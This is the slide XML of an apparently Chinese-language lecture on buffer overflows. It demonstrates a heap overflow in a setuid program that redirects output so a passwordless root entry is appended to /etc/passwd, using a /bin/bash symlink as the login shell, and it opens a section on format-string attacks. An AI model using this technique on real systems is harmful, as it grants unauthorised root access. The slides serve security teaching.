              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>$./heap 123456789012345678901234</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>Userinput @0x80498d0:123456789012345678901234</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>Outputfile @0x80498e8:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>Distance between:24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>-------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>Writing to “123456789012345678901234”  to the end of  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>Error opening </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>$cat /tmp/notes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>12345678901234567890123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2551146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2483E271-642E-4EAC-8038-CA88EBD62DC5}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73731" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73732" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1125538"/>
            <a:ext cx="7772400" cy="4818062"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>$./heap 123456789012345678901234testfile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>Userinput @0x80498d0:123456789012345678901234testfile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>Outputfile @0x80498e8:testfile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>Distance between:24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>-------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>Writing to “123456789012345678901234testfile”  to the end of  testfile;  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>$cat testfile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>123456789012345678901234testfile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="787549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E0EC35C9-C3A6-4A7B-8910-EAF506283C52}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74755" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74756" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>由于字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>testfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>溢出到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>outputfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>缓冲区。所以程序写的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>testfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>而不是预期的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>/tmp/notes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>这个程序是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>程序，所以数据可以加到任何文件上</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>/etc/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>上加一个有用的串似乎是个不错的想法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="960831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842C52FD-D652-46BF-901A-2B523C683954}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75779" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75780" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>$cp /etc/passwd /tmp/passwd.backup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>$cat /etc/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Root:x:0:0:root:/root:/bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>登陆名 密码 用户 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>组 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>id  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>用户名 根目录 登陆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>如果想加入一个系统管理员的帐户需要下面的字符串</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>Myroot::0:0:me:/root:/bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>但是我们如果要写入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>/etc/passwd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>则字符串的末尾必须是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>/etc/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1762685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6D305543-465C-46D8-B8BC-C8826AF7AC2E}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76803" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76804" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>$mkdir /tmp/etc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>$ln –s /bin/bash /tmp/etc/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>$/tmp/etc/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>$exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>Exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>$ls –l /tmp/etc/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>有效字符串为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>myroot::0:0:me:/root:/tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>/etc/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2074722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1B6DD754-9114-4E72-94BD-9A0C45F6D9AC}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77827" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>格式化字符串攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77828" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1196975"/>
            <a:ext cx="7772400" cy="4746625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>即使只有一点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>语言基础的人也会</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>printf()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>函数，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>语言教科书上通常的第一个程序就是“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Hello, World!” </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>    #include &lt;stdio.h&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>    void main(void) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>        {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>            printf("\nHello,World!\n\n");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>        } </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306589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zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>危害性和普遍性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293891" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="419101" y="1382680"/>
            <a:ext cx="8298180" cy="4699635"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>缓冲区溢出漏洞可以使一个匿名的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>用户有机会获得一台主机的部分或全部的控制权。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
